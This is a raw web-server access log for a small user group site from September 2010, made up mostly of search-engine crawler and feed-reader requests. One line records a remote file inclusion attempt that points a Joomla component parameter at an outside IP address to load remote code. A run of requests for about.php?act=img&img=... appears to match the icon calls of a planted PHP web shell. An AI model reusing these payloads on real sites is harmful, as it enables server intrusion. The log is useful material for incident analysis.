12.248.40.138 - - [07/Sep/2010:15:54:19 -0700] "GET /favicon.ico HTTP/1.1" 200 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
72.14.199.80 - - [07/Sep/2010:15:55:09 -0700] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=80&format=feed&type=rss HTTP/1.1" 404 1274 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=8774138234779298844)" 
173.192.238.37 - - [07/Sep/2010:15:55:25 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php HTTP/1.1" 200 6781 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=home HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=back HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=forward HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=up HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=search HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=buffer HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=help HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=sort_asc HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_lnk HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_diz HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=small_dir HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_php HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=change HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=download HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_php-dist HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_gif HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_ico HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_txt HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
12.248.40.138 - - [07/Sep/2010:15:55:42 -0700] "GET /about.php?act=img&img=ext_html HTTP/1.1" 503 469 "http://seaflexug.org/about.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" 
77.88.42.25 - - [07/Sep/2010:15:59:31 -0700] "GET /index.php?option=com_content&view=article&id=168:sep-10th-meeting-debugging-with-the-experts&catid=70:meeting-information&Itemid=60&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.196 - - [07/Sep/2010:16:06:14 -0700] "GET /index.php?option=com_booklibrary&task=view&id=16&catid=64&Itemid=55&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:16:06:58 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53&limitstart=20 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
24.22.157.156 - - [07/Sep/2010:16:12:24 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Apple-PubSub/65.20" 
77.88.42.25 - - [07/Sep/2010:16:14:26 -0700] "GET /index.php?option=com_booklibrary&task=show_search&catid=0&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [07/Sep/2010:16:17:57 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
8.14.219.85 - - [07/Sep/2010:16:21:14 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
67.195.111.232 - - [07/Sep/2010:16:26:04 -0700] "GET /index.php?option=com_user&task=register HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 
207.46.199.184 - - [07/Sep/2010:16:28:03 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
77.88.42.25 - - [07/Sep/2010:16:36:51 -0700] "GET /index.php?option=com_alfcontact&Itemid=64&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
38.107.191.90 - - [07/Sep/2010:16:38:56 -0700] "GET /robots.txt HTTP/1.1" 200 432 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.91 - - [07/Sep/2010:16:39:43 -0700] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 510 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.92 - - [07/Sep/2010:16:40:31 -0700] "GET /index.php?option=com_wrapper&view=wrapper&Itemid=63 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.93 - - [07/Sep/2010:16:41:19 -0700] "GET /index.php?limitstart=5 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.94 - - [07/Sep/2010:16:41:54 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
24.22.157.156 - - [07/Sep/2010:16:42:26 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Apple-PubSub/65.20" 
38.107.191.90 - - [07/Sep/2010:16:42:35 -0700] "GET /index.php?option=com_booklibrary&Itemid=56 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.91 - - [07/Sep/2010:16:43:08 -0700] "GET /index.php?option=com_alfcontact&Itemid=64 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.92 - - [07/Sep/2010:16:43:41 -0700] "GET /index.php?option=com_content&view=category&id=74&Itemid=76 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.93 - - [07/Sep/2010:16:44:11 -0700] "GET /index.php?fontstyle=f-larger HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.94 - - [07/Sep/2010:16:45:37 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2685 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.90 - - [07/Sep/2010:16:46:26 -0700] "GET /index.php?fontstyle=f-smaller HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.91 - - [07/Sep/2010:16:47:08 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=67&Itemid=61 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.92 - - [07/Sep/2010:16:47:53 -0700] "GET /index.php?option=com_weblinks&view=categories&Itemid=55 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.93 - - [07/Sep/2010:16:48:37 -0700] "GET /index.php?option=com_content&view=article&id=46&Itemid=41 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.94 - - [07/Sep/2010:16:49:06 -0700] "GET /index.php?option=com_gcalendar&view=gcalendar&Itemid=62 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.90 - - [07/Sep/2010:16:49:39 -0700] "GET /index.php?option=com_content&view=article&id=102:meet-edge-tech-corp&catid=1:general&Itemid=53 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.91 - - [07/Sep/2010:16:50:19 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 1963 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.92 - - [07/Sep/2010:16:50:56 -0700] "GET /index.php?option=com_user&task=register HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
8.14.219.85 - - [07/Sep/2010:16:51:16 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
77.88.42.25 - - [07/Sep/2010:16:51:34 -0700] "GET /index.php?option=com_booklibrary&task=view&id=8&catid=66&Itemid=56 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
77.88.42.25 - - [07/Sep/2010:16:51:36 -0700] "GET /index.php?option=com_booklibrary&task=view&id=55&catid=63&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
38.107.191.93 - - [07/Sep/2010:16:52:54 -0700] "GET /index.php?fontstyle=f-default HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
38.107.191.94 - - [07/Sep/2010:16:53:24 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=70&Itemid=60 HTTP/1.1" 200 429 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" 
174.36.241.149 - - [07/Sep/2010:16:55:29 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
77.88.42.25 - - [07/Sep/2010:16:59:28 -0700] "GET /index.php?option=com_booklibrary&task=view&id=9&catid=66&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.246 - - [07/Sep/2010:17:00:10 -0700] "GET /index.php?view=weblink&catid=19%3Aother-user-groups&id=36%3Aseattle-drupal-user-group&option=com_weblinks&Itemid=55 HTTP/1.1" 301 449 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:17:01:59 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
77.88.42.25 - - [07/Sep/2010:17:07:18 -0700] "GET /index.php?option=com_booklibrary&task=view&id=42&catid=66&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.196 - - [07/Sep/2010:17:11:02 -0700] "GET /index.php?option=com_booklibrary&task=view&id=35&catid=66&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
38.113.234.181 - - [07/Sep/2010:17:11:20 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "Voyager/1.0" 
77.88.42.25 - - [07/Sep/2010:17:15:07 -0700] "GET /index.php?option=com_booklibrary&task=view&id=14&catid=63&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
89.178.246.60 - - [07/Sep/2010:17:20:28 -0700] "GET /index.php HTTP/1.0" 200 505 "http://www.seaflexug.org/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" 
72.14.199.80 - - [07/Sep/2010:17:20:47 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
8.14.219.85 - - [07/Sep/2010:17:21:18 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
66.249.71.196 - - [07/Sep/2010:17:21:28 -0700] "GET /index.php?option=com_booklibrary&task=showCategory&catid=66&Itemid=56&limitstart=10&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:17:21:31 -0700] "GET /blog?format=feed&type=rss HTTP/1.1" 404 491 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=17205210357194660069)" 
77.88.42.25 - - [07/Sep/2010:17:22:57 -0700] "GET /index.php?option=com_booklibrary&task=view&id=21&catid=62&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
207.46.199.199 - - [07/Sep/2010:17:23:13 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
66.249.71.196 - - [07/Sep/2010:17:32:17 -0700] "GET /index.php?option=com_booklibrary&task=view&id=34&catid=64&Itemid=55&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:17:38:36 -0700] "GET /index.php?option=com_content&view=article&id=182:seaflex-site-changing&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.196 - - [07/Sep/2010:17:42:42 -0700] "GET /index.php?option=com_booklibrary&task=view&id=16&catid=64&Itemid=55&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
24.22.157.156 - - [07/Sep/2010:17:45:02 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Apple-PubSub/65.20" 
193.105.210.175 - - [07/Sep/2010:17:45:15 -0700] "GET /index.php HTTP/1.0" 200 505 "http://seaflexug.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" 
8.14.219.85 - - [07/Sep/2010:17:51:20 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
77.88.42.25 - - [07/Sep/2010:17:54:16 -0700] "GET /index.php?option=com_content&view=article&id=86:ecmascript-standard-decided&catid=1:general&Itemid=53 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
174.36.241.149 - - [07/Sep/2010:17:55:36 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
72.14.199.193 - - [07/Sep/2010:17:55:59 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2069 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=12972516030749612519)" 
77.88.42.25 - - [07/Sep/2010:18:02:05 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.246 - - [07/Sep/2010:18:03:02 -0700] "GET /robots.txt HTTP/1.1" 200 469 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
66.249.71.246 - - [07/Sep/2010:18:03:02 -0700] "GET /index.php?option=com_booklibrary&task=view&id=11&catid=66&Itemid=56 HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:18:09:01 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
66.249.71.196 - - [07/Sep/2010:18:13:08 -0700] "GET /index.php?option=com_booklibrary&task=view&id=16&catid=64&Itemid=55&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
24.22.157.156 - - [07/Sep/2010:18:15:04 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Apple-PubSub/65.20" 
77.88.42.25 - - [07/Sep/2010:18:17:43 -0700] "GET /index.php?option=com_booklibrary&task=view&id=20&catid=62&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
8.14.219.85 - - [07/Sep/2010:18:21:23 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
72.14.199.80 - - [07/Sep/2010:18:25:18 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
77.88.42.25 - - [07/Sep/2010:18:25:34 -0700] "GET /index.php?option=com_content&view=article&id=106:december-8th-meeting-ribbit&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
77.88.42.25 - - [07/Sep/2010:18:32:19 -0700] "GET /index.php?option=com_booklibrary&task=view&id=11&catid=66&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.196 - - [07/Sep/2010:18:34:57 -0700] "GET /index.php?option=com_booklibrary&task=view&id=47&catid=65&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:18:40:39 -0700] "GET /index.php?option=com_booklibrary&task=view&id=11&catid=66&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.193 - - [07/Sep/2010:18:45:07 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2783 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=6223356482245172981)" 
184.73.62.73 - - [07/Sep/2010:18:45:28 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "PostRank/2.0 (postrank.com; 1 subscribers)" 
207.46.12.237 - - [07/Sep/2010:18:46:14 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
124.115.0.140 - - [07/Sep/2010:18:46:15 -0700] "GET / HTTP/1.1" 200 547 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" 
77.88.42.25 - - [07/Sep/2010:18:48:55 -0700] "GET /index.php?option=com_booklibrary&task=view&id=31&catid=66&Itemid=56&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
8.14.219.85 - - [07/Sep/2010:18:51:24 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
207.46.12.237 - - [07/Sep/2010:18:52:52 -0700] "GET /index.php?option=com_content&view=article&id=167:august-13th-meeting-custom-components&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
72.14.199.80 - - [07/Sep/2010:18:55:15 -0700] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=80&format=feed&type=rss HTTP/1.1" 404 1274 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=8774138234779298844)" 
174.37.205.71 - - [07/Sep/2010:18:55:39 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
66.249.71.196 - - [07/Sep/2010:18:56:15 -0700] "GET /index.php?option=com_booklibrary&task=view&id=47&catid=65&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:18:57:11 -0700] "GET /index.php?option=com_content&view=article&id=135:bio-nate-beck&catid=67:presenters&Itemid=61 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [07/Sep/2010:18:57:48 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=6873439543726112842)" 
38.113.234.181 - - [07/Sep/2010:19:04:30 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "Voyager/1.0" 
77.88.42.25 - - [07/Sep/2010:19:05:27 -0700] "GET /index.php?option=com_booklibrary&task=view&id=36&catid=64&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
66.249.71.246 - - [07/Sep/2010:19:06:50 -0700] "GET /index.php?option=com_content&view=article&id=56:july-10th-meeting-understanding-application-performance&catid=70:meeting-information&Itemid=60&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:19:07:27 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
88.131.106.5 - - [07/Sep/2010:19:10:18 -0700] "GET /robots.txt HTTP/1.0" 200 432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 
88.131.106.1 - - [07/Sep/2010:19:10:21 -0700] "GET / HTTP/1.0" 200 510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 
66.249.71.246 - - [07/Sep/2010:19:17:36 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=67&Itemid=61&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
64.72.112.41 - - [07/Sep/2010:19:19:41 -0700] "GET //administrator/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=http%3A%2F%2F193.111.244.157%2Fzzzz%2Fwww.seaflexug.org%2F201 HTTP/1.1" 404 579 "-" "-" 
207.46.13.91 - - [07/Sep/2010:19:21:04 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
8.14.219.85 - - [07/Sep/2010:19:21:26 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Apple-PubSub/65.20" 
77.88.42.25 - - [07/Sep/2010:19:21:59 -0700] "GET / HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
195.117.61.130 - - [07/Sep/2010:19:24:34 -0700] "GET /forum/posting.php?mode=quote&f=4&p=2 HTTP/1.0" 404 521 "http://seaflexug.org/forum/posting.php?mode=quote&f=4&p=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)" 
24.7.188.50 - - [07/Sep/2010:19:27:21 -0700] "GET / HTTP/1.0" 200 505 "http://seaflexug.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)" 
66.249.71.246 - - [07/Sep/2010:19:28:32 -0700] "GET /index.php?option=com_content&view=category&id=74&Itemid=76&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:19:31:13 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
67.195.111.232 - - [07/Sep/2010:19:35:56 -0700] "GET /index.php?option=com_weblinks&view=category&id=19%3Aother-user-groups&Itemid=55&format=feed&type=atom HTTP/1.0" 200 7436 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 
77.88.42.25 - - [07/Sep/2010:19:38:33 -0700] "GET /index.php?option=com_booklibrary&task=view&id=41&catid=66&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
